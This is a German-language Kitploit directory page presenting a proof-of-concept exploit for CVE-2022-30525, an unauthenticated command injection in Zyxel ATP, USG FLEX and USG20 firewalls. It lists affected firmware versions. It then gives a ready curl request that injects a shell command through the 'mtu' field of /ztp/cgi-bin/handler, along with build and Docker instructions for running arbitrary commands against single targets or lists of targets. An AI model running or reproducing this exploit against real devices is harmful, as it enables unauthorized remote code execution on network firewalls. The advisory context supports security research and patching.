Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2022-30525 — Erster PoC für CVE-2022-30525 | Kitploit
Tools/GitHubGitHub/iveresk/cve-2022-30525
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubiveresk/cve-2022-30525

cve-2022-30525

Erster PoC für CVE-2022-30525

Repository anzeigen
3vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-30525 von 1vere$k

Rapid7 entdeckte und meldete eine Sicherheitslücke, die Zyxel-Firewalls betrifft, die Zero Touch Provisioning (ZTP) unterstützen, darunter die ATP-Serie, VPN-Serie und die USG-FLEX-Serie (einschließlich USG20-VPN und USG20W-VPN). Die Sicherheitslücke, identifiziert als CVE-2022-30525, ermöglicht es einem nicht authentifizierten, entfernten Angreifer, beliebigen Code als der Benutzer nobody auf dem betroffenen Gerät auszuführen.

Die folgende Tabelle enthält die betroffenen Modelle und Firmware-Versionen.

Betroffenes Modell USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 bis ZLD5.21 Patch 1 USG20-VPN, USG20W-VPN ZLD5.10 bis ZLD5.21 Patch 1 ATP 100, 200, 500, 700, 800 ZLD5.10 bis ZLD5.21 Patch 1

Die VPN-Serie, die ebenfalls ZTP unterstützt, ist nicht anfällig, da sie die erforderliche Funktionalität nicht unterstützt.

Die betroffenen Modelle sind anfällig für nicht authentifizierte, entfernte Befehlseinschleusung über die administrative HTTP-Schnittstelle. Befehle werden als der Benutzer nobody ausgeführt. Diese Sicherheitslücke wird über den URI /ztp/cgi-bin/handler ausgenutzt.

Curl Beispiel

root@kitploit:~
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler

Verwendung

Es sollte eine cmds-Datei erstellt werden, in der Sie Befehle hinzufügen können, die über das Programm im folgenden Format ausgeführt werden:

root@kitploit:~
bash -c "command#1 && command#2 && etc."

For example:
bash -c "ping 8.8.8.8"

Golang

root@kitploit:~
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]

Dockerfile

root@kitploit:~
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525

Wobei INPUT_FILE eine Ziel-URL oder eine Datei mit einer Liste von Zielen ist.

Kontakt

Sie können mich jederzeit über Keybase für weitere Details kontaktieren.

Tool herunterladen